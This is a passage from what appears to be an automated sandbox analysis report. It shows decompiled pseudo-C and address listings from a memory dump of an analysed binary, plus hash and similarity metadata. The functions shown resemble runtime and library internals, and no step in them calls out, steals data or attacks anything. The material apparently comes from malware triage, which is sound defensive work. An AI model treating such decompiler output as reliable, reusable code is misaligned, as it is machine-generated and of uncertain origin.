                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000001;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000002;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				 *(_t446 + 0x78) = r10d;
                                                                                                                            				 *(_t446 + 0x5c) = r10d;
                                                                                                                            				 *(_t446 + 0x54) = r10d;
                                                                                                                            				 *(_t446 + 0x48) = r10d;
                                                                                                                            				r14d = r10d;
                                                                                                                            				r12d = r8d;
                                                                                                                            				 *(_t446 + 0x50) = r10d;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				_t217 = E0000025B25BF8A7B89C(_t383);
                                                                                                                            				 *_t383 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t217);
                                                                                                                            				r10d = 0;
                                                                                                                            				goto 0xf8a7cb39;
                                                                                                                            				if ( *((intOrPtr*)(_t444 - 0x40)) == r10b) goto 0xf8a7cb4a;
                                                                                                                            				 *( *((intOrPtr*)(_t444 - 0x48)) + 0xc8) =  *( *((intOrPtr*)(_t444 - 0x48)) + 0xc8) & 0xfffffffd;
                                                                                                                            				return E0000025B25BF8A81A50(_t383 + _t383 * 4, _t396,  *(_t444 + 0x1d8) ^ _t446,  *((intOrPtr*)(_t446 + 0x68)),  &(_t437[0]), _t442, _t444, __r12);
                                                                                                                            			}
                                                                                                                            0x25bf8a7c3fe
                                                                                                                            0x25bf8a7c407
                                                                                                                            0x25bf8a7c40f
                                                                                                                            0x25bf8a7c417
                                                                                                                            0x25bf8a7c41a
                                                                                                                            0x25bf8a7c426
                                                                                                                            0x25bf8a7c428
                                                                                                                            0x25bf8a7c42d
                                                                                                                            0x25bf8a7c438
                                                                                                                            0x25bf8a7c43a
                                                                                                                            0x25bf8a7c43f
                                                                                                                            0x25bf8a7c443
                                                                                                                            0x25bf8a7c44b
                                                                                                                            0x25bf8a7c450
                                                                                                                            0x25bf8a7c455
                                                                                                                            0x25bf8a7c457
                                                                                                                            0x25bf8a7c45f
                                                                                                                            0x25bf8a7c465
                                                                                                                            0x25bf8a7c46d
                                                                                                                            0x25bf8a7c474
                                                                                                                            0x25bf8a7c479
                                                                                                                            0x25bf8a7c481
                                                                                                                            0x25bf8a7c485
                                                                                                                            0x25bf8a7c489
                                                                                                                            0x25bf8a7c48d
                                                                                                                            0x25bf8a7c493
                                                                                                                            0x25bf8a7c499
                                                                                                                            0x25bf8a7c49f
                                                                                                                            0x25bf8a7c4a7
                                                                                                                            0x25bf8a7c4b0
                                                                                                                            0x25bf8a7c4b5
                                                                                                                            0x25bf8a7c4be
                                                                                                                            0x25bf8a7c4c7
                                                                                                                            0x25bf8a7c4d0
                                                                                                                            0x25bf8a7c4d5
                                                                                                                            0x25bf8a7c4de
                                                                                                                            0x25bf8a7c4e7
                                                                                                                            0x25bf8a7c4f0
                                                                                                                            0x25bf8a7c4f2
                                                                                                                            0x25bf8a7c4f8
                                                                                                                            0x25bf8a7c500
                                                                                                                            0x25bf8a7c508
                                                                                                                            0x25bf8a7c50d
                                                                                                                            0x25bf8a7c515
                                                                                                                            0x25bf8a7c518
                                                                                                                            0x25bf8a7c51f
                                                                                                                            0x25bf8a7c526
                                                                                                                            0x25bf8a7c52a
                                                                                                                            0x25bf8a7c52e
                                                                                                                            0x25bf8a7c533
                                                                                                                            0x25bf8a7c539
                                                                                                                            0x25bf8a7c543
                                                                                                                            0x25bf8a7c547
                                                                                                                            0x25bf8a7c550
                                                                                                                            0x25bf8a7c554
                                                                                                                            0x25bf8a7c55d
                                                                                                                            0x25bf8a7c561
                                                                                                                            0x25bf8a7c563
                                                                                                                            0x25bf8a7c56c
                                                                                                                            0x25bf8a7c56e
                                                                                                                            0x25bf8a7c571
                                                                                                                            0x25bf8a7c573
                                                                                                                            0x25bf8a7c57b
                                                                                                                            0x25bf8a7c580
                                                                                                                            0x25bf8a7c585
                                                                                                                            0x25bf8a7c58f
                                                                                                                            0x25bf8a7c591
                                                                                                                            0x25bf8a7c594
                                                                                                                            0x25bf8a7c596
                                                                                                                            0x25bf8a7c598
                                                                                                                            0x25bf8a7c5a0
                                                                                                                            0x25bf8a7c5a5
                                                                                                                            0x25bf8a7c5a9
                                                                                                                            0x25bf8a7c5b8
                                                                                                                            0x25bf8a7c5bb
                                                                                                                            0x25bf8a7c5c5
                                                                                                                            0x25bf8a7c5c7
                                                                                                                            0x25bf8a7c5cc
                                                                                                                            0x25bf8a7c5ce
                                                                                                                            0x25bf8a7c5d6
                                                                                                                            0x25bf8a7c5d8
                                                                                                                            0x25bf8a7c5e1
                                                                                                                            0x25bf8a7c5e8
                                                                                                                            0x25bf8a7c5ea
                                                                                                                            0x25bf8a7c5ef
                                                                                                                            0x25bf8a7c5f5
                                                                                                                            0x25bf8a7c5f7
                                                                                                                            0x25bf8a7c5fb
                                                                                                                            0x25bf8a7c5fd
                                                                                                                            0x25bf8a7c601
                                                                                                                            0x25bf8a7c60a
                                                                                                                            0x25bf8a7c60f
                                                                                                                            0x25bf8a7c614
                                                                                                                            0x25bf8a7c619
                                                                                                                            0x25bf8a7c61c
                                                                                                                            0x25bf8a7c61e
                                                                                                                            0x25bf8a7c623
                                                                                                                            0x25bf8a7c62b
                                                                                                                            0x25bf8a7c62d
                                                                                                                            0x25bf8a7c633
                                                                                                                            0x25bf8a7c635
                                                                                                                            0x25bf8a7c63c
                                                                                                                            0x25bf8a7c640
                                                                                                                            0x25bf8a7c648
                                                                                                                            0x25bf8a7c652
                                                                                                                            0x25bf8a7c656
                                                                                                                            0x25bf8a7c65d
                                                                                                                            0x25bf8a7c662
                                                                                                                            0x25bf8a7c667
                                                                                                                            0x25bf8a7c677
                                                                                                                            0x25bf8a7c677
                                                                                                                            0x25bf8a7c67d
                                                                                                                            0x25bf8a7c67f
                                                                                                                            0x25bf8a7c682
                                                                                                                            0x25bf8a7c687
                                                                                                                            0x25bf8a7c689
                                                                                                                            0x25bf8a7c68e
                                                                                                                            0x25bf8a7c695
                                                                                                                            0x25bf8a7c697
                                                                                                                            0x25bf8a7c69a
                                                                                                                            0x25bf8a7c6a1
                                                                                                                            0x25bf8a7c6a9
                                                                                                                            0x25bf8a7c6ab
                                                                                                                            0x25bf8a7c6ae
                                                                                                                            0x25bf8a7c6b7
                                                                                                                            0x25bf8a7c6bb
                                                                                                                            0x25bf8a7c6be
                                                                                                                            0x25bf8a7c6c3
                                                                                                                            0x25bf8a7c6c9
                                                                                                                            0x25bf8a7c6cb
                                                                                                                            0x25bf8a7c6d1
                                                                                                                            0x25bf8a7c6d6
                                                                                                                            0x25bf8a7c6e1
                                                                                                                            0x25bf8a7c6e3
                                                                                                                            0x25bf8a7c6ee
                                                                                                                            0x25bf8a7c6f3
                                                                                                                            0x25bf8a7c6f7
                                                                                                                            0x25bf8a7c6fa
                                                                                                                            0x25bf8a7c6fc
                                                                                                                            0x25bf8a7c701
                                                                                                                            0x25bf8a7c703
                                                                                                                            0x25bf8a7c709
                                                                                                                            0x25bf8a7c714
                                                                                                                            0x25bf8a7c71c
                                                                                                                            0x25bf8a7c71f
                                                                                                                            0x25bf8a7c723
                                                                                                                            0x25bf8a7c72d
                                                                                                                            0x25bf8a7c730
                                                                                                                            0x25bf8a7c73c
                                                                                                                            0x25bf8a7c747
                                                                                                                            0x25bf8a7c74c
                                                                                                                            0x25bf8a7c757
                                                                                                                            0x25bf8a7c75c
                                                                                                                            0x25bf8a7c765
                                                                                                                            0x25bf8a7c772
                                                                                                                            0x25bf8a7c778
                                                                                                                            0x25bf8a7c77c
                                                                                                                            0x25bf8a7c785
                                                                                                                            0x25bf8a7c792
                                                                                                                            0x25bf8a7c797
                                                                                                                            0x25bf8a7c799
                                                                                                                            0x25bf8a7c79e
                                                                                                                            0x25bf8a7c7a4
                                                                                                                            0x25bf8a7c7a9
                                                                                                                            0x25bf8a7c7ac
                                                                                                                            0x25bf8a7c7b5
                                                                                                                            0x25bf8a7c7bb
                                                                                                                            0x25bf8a7c7bf
                                                                                                                            0x25bf8a7c7c1
                                                                                                                            0x25bf8a7c7c6
                                                                                                                            0x25bf8a7c7c8
                                                                                                                            0x25bf8a7c7cd
                                                                                                                            0x25bf8a7c7d3
                                                                                                                            0x25bf8a7c7d5
                                                                                                                            0x25bf8a7c7df
                                                                                                                            0x25bf8a7c7e3
                                                                                                                            0x25bf8a7c7e9
                                                                                                                            0x25bf8a7c7eb
                                                                                                                            0x25bf8a7c7f0
                                                                                                                            0x25bf8a7c809
                                                                                                                            0x25bf8a7c817
                                                                                                                            0x25bf8a7c82f
                                                                                                                            0x25bf8a7c834
                                                                                                                            0x25bf8a7c83d
                                                                                                                            0x25bf8a7c843
                                                                                                                            0x25bf8a7c851
                                                                                                                            0x25bf8a7c85b
                                                                                                                            0x25bf8a7c85f
                                                                                                                            0x25bf8a7c863
                                                                                                                            0x25bf8a7c868
                                                                                                                            0x25bf8a7c877
                                                                                                                            0x25bf8a7c883
                                                                                                                            0x25bf8a7c888
                                                                                                                            0x25bf8a7c88d
                                                                                                                            0x25bf8a7c894
                                                                                                                            0x25bf8a7c8ab
                                                                                                                            0x25bf8a7c8b0
                                                                                                                            0x25bf8a7c8b5
                                                                                                                            0x25bf8a7c8ba
                                                                                                                            0x25bf8a7c8c1
                                                                                                                            0x25bf8a7c8cb
                                                                                                                            0x25bf8a7c8cf
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: write_multi_charwrite_string$write_char$_errno_invalid_parameter_noinfo_isleadbyte_l_malloc_crtfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2600834739-3916222277
                                                                                                                            • Opcode ID: e3e566d70056c7d1e8ce5c42388648ee8896ba91cc01bb873bcd7a67f372db64
                                                                                                                            • Instruction ID: 47c824dea6f9d2bf027e9a06ed0030d2d64c6f37a1fe349a434fac74f55515ae
                                                                                                                            • Opcode Fuzzy Hash: e3e566d70056c7d1e8ce5c42388648ee8896ba91cc01bb873bcd7a67f372db64
                                                                                                                            • Instruction Fuzzy Hash: 3332E173208E9486FF668A149C4C3BE6BA0F7457B6F341006FA4657ED5DB39C940EB28
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 70%
                                                                                                                            			E01324F60(signed char __eax, signed int __esi, signed long long __rax, signed long long __rbx, signed long long __rcx, signed long long __rdx, unsigned long long __rdi, long long __rbp, signed long long __r10, void* __r14, signed long long _a8, signed long long _a16) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				void* _v24;
                                                                                                                            				unsigned long long _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				char _v48;
                                                                                                                            				signed long long _v56;
                                                                                                                            				signed long long _v64;
                                                                                                                            				signed long long _v72;
                                                                                                                            				unsigned long long _v80;
                                                                                                                            				long long _v88;
                                                                                                                            				void* _v96;
                                                                                                                            				signed long long _v104;
                                                                                                                            				signed int _v112;
                                                                                                                            				signed long long _v120;
                                                                                                                            				signed int _v128;
                                                                                                                            				signed int _v136;
                                                                                                                            				signed int _v144;
                                                                                                                            				signed long long _v152;
                                                                                                                            				unsigned long long _v160;
                                                                                                                            				signed long long _v168;
                                                                                                                            				unsigned long long _v176;
                                                                                                                            				signed long long _v184;
                                                                                                                            				long long _v192;
                                                                                                                            				unsigned long long _v200;
                                                                                                                            				signed long long _v208;
                                                                                                                            				signed long long _v216;
                                                                                                                            				unsigned long long _v224;
                                                                                                                            				unsigned long long _v232;
                                                                                                                            				long long _v240;
                                                                                                                            				unsigned long long _v248;
                                                                                                                            				unsigned long long _v256;
                                                                                                                            				signed char _t189;
                                                                                                                            				void* _t265;
                                                                                                                            				void* _t266;
                                                                                                                            				signed char _t297;
                                                                                                                            				signed int _t300;
                                                                                                                            				signed int _t301;
                                                                                                                            				signed int _t302;
                                                                                                                            				void* _t303;
                                                                                                                            				void* _t312;
                                                                                                                            				signed long long _t315;
                                                                                                                            				signed long long _t317;
                                                                                                                            				signed int _t331;
                                                                                                                            				signed long long _t357;
                                                                                                                            				unsigned long long _t361;
                                                                                                                            				signed int _t362;
                                                                                                                            				signed long long _t363;
                                                                                                                            				signed long long _t380;
                                                                                                                            				unsigned long long _t383;
                                                                                                                            				unsigned long long _t387;
                                                                                                                            				signed long long _t395;
                                                                                                                            				unsigned long long _t410;
                                                                                                                            				unsigned long long _t414;
                                                                                                                            				long long _t415;
                                                                                                                            				void* _t423;
                                                                                                                            				signed long long _t426;
                                                                                                                            				signed long long _t427;
                                                                                                                            				signed int* _t434;
                                                                                                                            				signed long long _t436;
                                                                                                                            				unsigned long long _t437;
                                                                                                                            				unsigned long long _t439;
                                                                                                                            				unsigned long long _t445;
                                                                                                                            				long long _t446;
                                                                                                                            				long long _t452;
                                                                                                                            				long long _t453;
                                                                                                                            				signed long long _t456;
                                                                                                                            				signed long long _t457;
                                                                                                                            				unsigned long long _t461;
                                                                                                                            				unsigned long long _t462;
                                                                                                                            				void* _t463;
                                                                                                                            				signed long long _t467;
                                                                                                                            				signed int _t478;
                                                                                                                            				unsigned long long _t482;
                                                                                                                            				intOrPtr _t487;
                                                                                                                            				signed long long _t488;
                                                                                                                            				signed long long _t489;
                                                                                                                            				unsigned long long _t490;
                                                                                                                            				signed int _t493;
                                                                                                                            				signed long long _t502;
                                                                                                                            				signed long long _t503;
                                                                                                                            				signed long long _t505;
                                                                                                                            				signed long long _t509;
                                                                                                                            				signed long long _t510;
                                                                                                                            				signed long long _t511;
                                                                                                                            				void* _t516;
                                                                                                                            				unsigned long long _t517;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t516 = __r14;
                                                                                                                            					_t488 = __r10;
                                                                                                                            					_t471 = __rbp;
                                                                                                                            					_t439 = __rdi;
                                                                                                                            					_t426 = __rdx;
                                                                                                                            					_t395 = __rcx;
                                                                                                                            					_t380 = __rbx;
                                                                                                                            					_t315 = __rax;
                                                                                                                            					_t302 = __esi;
                                                                                                                            					_t189 = __eax;
                                                                                                                            					_t503 =  &_v152;
                                                                                                                            					if(_t503 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L66;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t471 =  &_v8;
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_a16 = __rbx;
                                                                                                                            					asm("inc esp");
                                                                                                                            					_t452 =  *0x1465380; // 0xffff800000000000
                                                                                                                            					_v48 = _t452;
                                                                                                                            					_t453 =  *0x1465360; // 0x7fffffffffff
                                                                                                                            					_v40 = _t453;
                                                                                                                            					asm("inc esp");
                                                                                                                            					_v24 = 0x1325b20;
                                                                                                                            					_v16 =  &_v48;
                                                                                                                            					_t297 = 0;
                                                                                                                            					_t300 = 0;
                                                                                                                            					_t456 = 0xffffffff;
                                                                                                                            					_t301 = 0;
                                                                                                                            					L3:
                                                                                                                            					while(1) {
                                                                                                                            						L3:
                                                                                                                            						if(_t395 >= 5) {
                                                                                                                            							L10:
                                                                                                                            							_t457 = _t426;
                                                                                                                            							_t427 = _t426 >> 0xd;
                                                                                                                            							__eflags = _t427 - 0x2000;
                                                                                                                            							if(_t427 >= 0x2000) {
                                                                                                                            								L22:
                                                                                                                            								_t317 = _t427;
                                                                                                                            								_t297 = 0x2000;
                                                                                                                            								E013588E0();
                                                                                                                            								goto L23;
                                                                                                                            							} else {
                                                                                                                            								L11:
                                                                                                                            								_v56 = _t457;
                                                                                                                            								_t46 = _t427 * 8; // 0x7882894c0776f739
                                                                                                                            								_t434 =  *((intOrPtr*)(_t315 + _t46 + 0x78));
                                                                                                                            								__eflags =  *_t434 & _t189;
                                                                                                                            								_t302 = _t302 & 0x00001fff;
                                                                                                                            								_t457 = _t457 << 7;
                                                                                                                            								_t362 = _t434 + _t457;
                                                                                                                            								_t189 = E01327860(_t189, _t300, _t302, _t362, _t380, _t395, _t471, _t478, _t482, _t488, _t502, _t516);
                                                                                                                            								__eflags = _t362 - 0xffffffff;
                                                                                                                            								if(_t362 == 0xffffffff) {
                                                                                                                            									L13:
                                                                                                                            									_t436 = _a8;
                                                                                                                            									_t427 =  *((intOrPtr*)(_t436 + 0x60));
                                                                                                                            									_t363 = _v56;
                                                                                                                            									asm("o16 nop [eax+eax]");
                                                                                                                            									__eflags = _t363 -  *((intOrPtr*)(_t436 + 0x68));
                                                                                                                            									if(_t363 <  *((intOrPtr*)(_t436 + 0x68))) {
                                                                                                                            										L14:
                                                                                                                            										_t414 =  *((intOrPtr*)(_t427 + _t363 * 8));
                                                                                                                            										_t437 = _t414;
                                                                                                                            										_t387 = 0;
                                                                                                                            										__eflags = 0x00000000 & _t437;
                                                                                                                            										_t415 =  !=  ? 0 : _t414;
                                                                                                                            										asm("dec eax");
                                                                                                                            										if(__eflags >= 0) {
                                                                                                                            											_t387 = _t437 >> 0x15;
                                                                                                                            											asm("dec eax");
                                                                                                                            										}
                                                                                                                            										_v248 = _t387;
                                                                                                                            										_v240 = _t415;
                                                                                                                            										if(__eflags >= 0) {
                                                                                                                            											L19:
                                                                                                                            											_t437 = _t437 >> 0x2a;
                                                                                                                            											_t300 = _t300 & 0x001fffff;
                                                                                                                            											goto L18;
                                                                                                                            										} else {
                                                                                                                            											L17:
                                                                                                                            											_t300 = 0x200000;
                                                                                                                            											L18:
                                                                                                                            											_v256 = _t437;
                                                                                                                            											E01332340(_t437, _t471, _t516);
                                                                                                                            											E01332C40(0, _t301, _t302, _t303, 0x1388c85, _t387, _t471, _t516);
                                                                                                                            											E01332A40(0, _t300, _t301, _t302, _t303, 0x1388c85, _t457, _t471, _t516);
                                                                                                                            											E01332C40(0, _t301, _t302, _t303, 0x13867ff, _t387, _t471, _t516);
                                                                                                                            											E01332A40(0, _t300, _t301, _t302, _t303, _v56, _t457, _t471, _t516);
                                                                                                                            											E01332C40(0, _t301, _t302, _t303, 0x1386afc, _t387, _t471, _t516);
                                                                                                                            											E01332940(_t301, _t302, _t303, _v240, _t415, _t471, _t516);
                                                                                                                            											E01332C40(0, _t301, _t302, _t303, 0x13867b3, _t387, _t471, _t516);
                                                                                                                            											E01332940(_t301, _t302, _t303, _v248, _t415, _t471, _t516);
                                                                                                                            											E01332C40(0, _t301, _t302, _t303, 0x13867b3, _t387, _t471, _t516);
                                                                                                                            											E01332940(_t301, _t302, _t303, _v256, _t415, _t471, _t516);
                                                                                                                            											E01332C40(0, _t301, _t302, _t303, 0x13867b1, _t387, _t471, _t516);
                                                                                                                            											L013323C0(_t437, _t471, _t516);
                                                                                                                            											E01332340(_t437, _t471, _t516);
                                                                                                                            											E01332C40(0, _t301, _t302, _t303, 0x1389022, _t387, _t471, _t516);
                                                                                                                            											E01332940(_t301, _t302, _t303, _a16, _t415, _t471, _t516);
                                                                                                                            											E013325A0(0, _t300, _t301, _t302, _t303, _t471, _t516);
                                                                                                                            											L013323C0(_t437, _t471, _t516);
                                                                                                                            											E01330BA0(0x1388850, _t387, _t471);
                                                                                                                            											goto L19;
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            									L21:
                                                                                                                            									E013588C0();
                                                                                                                            									goto L22;
                                                                                                                            								} else {
                                                                                                                            									L12:
                                                                                                                            									_v144 = _t362;
                                                                                                                            									_v72 = _v56 << 0x16;
                                                                                                                            									_t265 = E01324E80( *_v24(), _t266, _t300, _t302, _a8, _v48, _t471, _t516);
                                                                                                                            									__eflags = (_v144 << 0xd) + _v72 + 0;
                                                                                                                            									return _t265;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							L4:
                                                                                                                            							asm("dec ebp");
                                                                                                                            							_t502 = _t395;
                                                                                                                            							r12d = 1;
                                                                                                                            							_t505 = _t503 << _t297 & _t488;
                                                                                                                            							_t517 =  *((intOrPtr*)(0x1466780 + _t502 * 8));
                                                                                                                            							_t427 = _t426 << _t297 & _t488;
                                                                                                                            							_t25 = (_t502 + _t502 * 2) * 8; // 0x13f5710d8b481375
                                                                                                                            							_t489 =  *((intOrPtr*)(_t315 + _t25 + 0x10));
                                                                                                                            							_t487 =  *((intOrPtr*)(_t315 + (_t502 + _t502 * 2) * 8));
                                                                                                                            							_t423 = _t427 + _t505;
                                                                                                                            							if(_t489 < _t423) {
                                                                                                                            								L65:
                                                                                                                            								_t426 = _t489;
                                                                                                                            								E01358940();
                                                                                                                            								break;
                                                                                                                            							} else {
                                                                                                                            								L5:
                                                                                                                            								asm("o16 nop [eax+eax]");
                                                                                                                            								if(_t427 > _t423) {
                                                                                                                            									L64:
                                                                                                                            									_t315 = _t427;
                                                                                                                            									L01358980();
                                                                                                                            									goto L65;
                                                                                                                            								} else {
                                                                                                                            									L6:
                                                                                                                            									_v112 = _t427;
                                                                                                                            									_v168 = _t456;
                                                                                                                            									_v160 = _t439;
                                                                                                                            									_t457 = 0x14667c0;
                                                                                                                            									_t510 =  *((intOrPtr*)(0x14667c0 + _t502 * 8));
                                                                                                                            									asm("dec ebp");
                                                                                                                            									_t482 = _t487 + (_v112 << 0x00000003 & _t427 - _t489 >> 0x0000003f);
                                                                                                                            									_t36 = _t315 + 0x10078; // 0x227099b10ff0db
                                                                                                                            									_t427 = _t505;
                                                                                                                            									_t489 =  *_t36 + 0x00000000 >> _t297 & 0x01466740;
                                                                                                                            									_t503 =  ~_t505 & _t489;
                                                                                                                            									_t478 = _v112;
                                                                                                                            									if(_t503 != _t478) {
                                                                                                                            										r12d = 0;
                                                                                                                            										__eflags = r12d;
                                                                                                                            									} else {
                                                                                                                            										_t503 = _t427 - 0x00000001 & _t489;
                                                                                                                            									}
                                                                                                                            									_v56 = _t502;
                                                                                                                            									_v64 = _t427;
                                                                                                                            									_v176 = _t517;
                                                                                                                            									_v32 = _t482;
                                                                                                                            									_v152 = _t503;
                                                                                                                            									r10d = 0;
                                                                                                                            									r13d = 0;
                                                                                                                            									L24:
                                                                                                                            									_t312 = _t503 - _t427;
                                                                                                                            									if(_t312 >= 0) {
                                                                                                                            										L43:
                                                                                                                            										__eflags = _t380 - _t489;
                                                                                                                            										if(_t380 <= _t489) {
                                                                                                                            											L53:
                                                                                                                            											_v104 = _t510;
                                                                                                                            											_v88 =  *((intOrPtr*)(_t457 + _t502 * 8));
                                                                                                                            											E01324E80(_t189, _t266, _t300, _t302, _t317, _v48, _t471, _t516);
                                                                                                                            											__eflags = _v88 - 0x40;
                                                                                                                            											asm("dec eax");
                                                                                                                            											_t459 = _v104 << 0xd;
                                                                                                                            											_t428 = 0;
                                                                                                                            											__eflags = (_v112 << _t297 & _t427) + (_v104 << 0xd) + 0;
                                                                                                                            											_t380 = _t317;
                                                                                                                            										} else {
                                                                                                                            											L44:
                                                                                                                            											__eflags = _t502;
                                                                                                                            											if(_t502 == 0) {
                                                                                                                            												L52:
                                                                                                                            												__eflags = 0;
                                                                                                                            												return 0;
                                                                                                                            											} else {
                                                                                                                            												L45:
                                                                                                                            												_t445 = _v160;
                                                                                                                            												_t490 = _t445;
                                                                                                                            												_t301 = _t301 & 0x001fffff;
                                                                                                                            												_t503 = 0;
                                                                                                                            												__eflags = 0x00000000 & _t490;
                                                                                                                            												r13d = 0x200000;
                                                                                                                            												_t446 =  !=  ? _t510 : _t445;
                                                                                                                            												asm("dec ecx");
                                                                                                                            												if(__eflags >= 0) {
                                                                                                                            													r10d = r10d & 0x001fffff;
                                                                                                                            													__eflags = r10d;
                                                                                                                            													asm("dec ecx");
                                                                                                                            													_t461 = _t490 >> 0x15;
                                                                                                                            													_t517 = _t461;
                                                                                                                            													_t457 = 0x14667c0;
                                                                                                                            												} else {
                                                                                                                            													r15d = 0x200000;
                                                                                                                            												}
                                                                                                                            												_v200 = _t517;
                                                                                                                            												_v192 = _t446;
                                                                                                                            												if(__eflags >= 0) {
                                                                                                                            													_t489 = _t490 >> 0x2a;
                                                                                                                            													r10d = r10d & 0x001fffff;
                                                                                                                            													__eflags = r10d;
                                                                                                                            												} else {
                                                                                                                            													r10d = 0x200000;
                                                                                                                            												}
                                                                                                                            												_v208 = _t489;
                                                                                                                            												E01332340(_t427, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x1388c85, _t380, _t471, _t516);
                                                                                                                            												_t403 = _v56 - 1;
                                                                                                                            												E01332A40(_t297, _t300, _t301, _t302, _t303, _v56 - 1, _t457, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x13867ff, _t380, _t471, _t516);
                                                                                                                            												E01332A40(_t297, _t300, _t301, _t302, _t303, _v168, _t457, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x13869bb, _t380, _t471, _t516);
                                                                                                                            												E01332940(_t301, _t302, _t303, _v192, _v56 - 1, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x13867b3, _t380, _t471, _t516);
                                                                                                                            												E01332940(_t301, _t302, _t303, _v200, _v56 - 1, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x13867b3, _t380, _t471, _t516);
                                                                                                                            												E01332940(_t301, _t302, _t303, _v208, _v56 - 1, _t471, _t516);
                                                                                                                            												E013325A0(_t297, _t300, _t301, _t302, _t303, _t471, _t516);
                                                                                                                            												L013323C0(_t427, _t471, _t516);
                                                                                                                            												E01332340(_t427, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x1388c52, _t380, _t471, _t516);
                                                                                                                            												E01332A40(_t297, _t300, _t301, _t302, _t303, _v56, _t457, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x138775c, _t380, _t471, _t516);
                                                                                                                            												E01332940(_t301, _t302, _t303, _a16, _t403, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x1386db3, _t380, _t471, _t516);
                                                                                                                            												E01332A40(_t297, _t300, _t301, _t302, _t303, _v152, _t457, _t471, _t516);
                                                                                                                            												E013325A0(_t297, _t300, _t301, _t302, _t303, _t471, _t516);
                                                                                                                            												L013323C0(_t427, _t471, _t516);
                                                                                                                            												_v72 =  *((intOrPtr*)(_a8 + 0x10078));
                                                                                                                            												E01332340(_t427, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x138abf8, _t380, _t471, _t516);
                                                                                                                            												L01332AA0(_t300, _t301, _t303, _v72, _t403, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x1386c0b, _t380, _t471, _t516);
                                                                                                                            												E01332A40(_t297, _t300, _t301, _t302, _t303, _v112, _t457, _t471, _t516);
                                                                                                                            												E013325A0(_t297, _t300, _t301, _t302, _t303, _t471, _t516);
                                                                                                                            												L013323C0(_t427, _t471, _t516);
                                                                                                                            												_t357 = _v56;
                                                                                                                            												_v88 =  *((intOrPtr*)(0x14667c0 + _t357 * 8));
                                                                                                                            												_t427 =  *((intOrPtr*)(0x1466740 + _t357 * 8));
                                                                                                                            												_v96 = 0x1466740;
                                                                                                                            												E01332340(_t427, _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x138be1c, _t380, _t471, _t516);
                                                                                                                            												E01332940(_t301, _t302, _t303, _v88,  *((intOrPtr*)(0x14667c0 + _t357 * 8)), _t471, _t516);
                                                                                                                            												E01332C40(_t297, _t301, _t302, _t303, 0x1389aa6, _t380, _t471, _t516);
                                                                                                                            												_t331 = _v96;
                                                                                                                            												E01332940(_t301, _t302, _t303, _t331,  *((intOrPtr*)(0x14667c0 + _t357 * 8)), _t471, _t516);
                                                                                                                            												E013325A0(_t297, _t300, _t301, _t302, _t303, _t471, _t516);
                                                                                                                            												L013323C0(_t427, _t471, _t516);
                                                                                                                            												while(1) {
                                                                                                                            													L55:
                                                                                                                            													__eflags = _t331 - _v64;
                                                                                                                            													if(_t331 >= _v64) {
                                                                                                                            														break;
                                                                                                                            													}
                                                                                                                            													L56:
                                                                                                                            													_t428 = _v32;
                                                                                                                            													_t383 =  *((intOrPtr*)(_v32 + _t331 * 8));
                                                                                                                            													_t459 = _t383;
                                                                                                                            													__eflags = 0x00000000 & _t459;
                                                                                                                            													r8d = 0x200000;
                                                                                                                            													_t380 =  !=  ? _t478 : _t383;
                                                                                                                            													asm("dec eax");
                                                                                                                            													if(__eflags >= 0) {
                                                                                                                            														_t302 = _t302 & 0x001fffff;
                                                                                                                            														__eflags = _t302;
                                                                                                                            														asm("dec ecx");
                                                                                                                            														_t489 = _t459 >> 0x15;
                                                                                                                            														_t482 = _t489;
                                                                                                                            													} else {
                                                                                                                            														r9d = 0x200000;
                                                                                                                            													}
                                                                                                                            													_v136 = _t331;
                                                                                                                            													_v224 = _t482;
                                                                                                                            													_v216 = _t380;
                                                                                                                            													if(__eflags >= 0) {
                                                                                                                            														_t459 = _t459 >> 0x2a;
                                                                                                                            														_t302 = _t302 & 0x001fffff;
                                                                                                                            													} else {
                                                                                                                            														_t302 = 0x200000;
                                                                                                                            													}
                                                                                                                            													_v232 = _t459;
                                                                                                                            													E01332340(_t428, _t471, _t516);
                                                                                                                            													E01332C40(_t297, _t301, _t302, _t303, 0x1388c85, _t380, _t471, _t516);
